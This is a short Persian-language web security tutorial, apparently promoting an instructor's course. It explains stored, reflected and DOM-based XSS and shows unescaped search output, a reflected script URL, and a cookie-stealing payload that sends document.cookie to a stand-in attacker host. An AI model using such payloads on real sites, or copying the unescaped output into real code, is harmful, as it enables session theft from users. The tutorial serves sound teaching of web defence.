حملات XSS (مخفف Cross-Site Scripting) یک آسیب‌پذیری امنیتی رایج در وب است که به مهاجم اجازه می‌دهد کدهای مخرب (معمولاً JavaScript) را در صفحات وب تزریق کند. وقتی کاربران این صفحات را باز می‌کنند، کد مخرب در مرورگرشان اجرا شده و اطلاعات حساسشان (مثل کوکی‌ها، نشست‌ها یا داده‌های فرم) به سرور مهاجم ارسال می‌شود.

🔹 انواع حملات XSS
۱. ذخیره‌شده (Stored/Persistent XSS)

کد مخرب در سرور ذخیره می‌شود (مثلاً در دیتابیس) و هر بار که صفحه لود می‌شود، اجرا می‌شود.

مثال: تزریق اسکریپت در بخش نظرات یک وبلاگ.

۲. بازتابی (Reflected XSS)

کد مخرب در URL یا پارامترهای درخواست قرار می‌گیرد و سرور آن را بدون فیلتر کردن بازمی‌گرداند.

مثال: یک لینک مخرب که کاربر روی آن کلیک می‌کند و اسکریپت اجرا می‌شود.

۳. مبتنی بر DOM (DOM-based XSS)

آسیب‌پذیری در سمت کلاینت (JavaScript) است و بدون ارتباط با سرور اتفاق می‌افتد.

مثال: تغییر DOM صفحه با دستکاری پارامترهای URL.

فرض کنید یک سایت فرم جستجو دارد که نتیجه را این‌گونه نمایش می‌دهد:
                         <p>نتایج جستجو برای: @Request.QueryString["query"]</p>

اگر مهاجم این URL را بسازد:

              http://example.com/search?query=<script>alert('Hacked!');</script>
کد <script> اجرا شده و یک پیام نمایش داده می‌شود. در حالت واقعی، مهاجم ممکن است کوکی‌های کاربر را بدزدد:
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>
 
🔹 جمع‌بندی
حملات XSS یکی از خطرناک‌ترین تهدیدات امنیتی در وب هستند، زیرا مهاجم می‌تواند اطلاعات کاربران را بدزدد یا اقدامات مخرب دیگری انجام دهد. با رعایت اصول کدنویسی امن و فیلتر کردن داده‌های کاربر، می‌توان از این 
حملات جلوگیری کرد.

می توانید برای دیدن ویدیو به آدرس اینستا مدرس بهمن ابادی bahmanabadi.developer رجوع کنید.

همچنین این موضوع و راههای جلوگیری از آن به طور کامل در دوره جامع آموزش برنامه نویسی وب توضیح داده شده اند.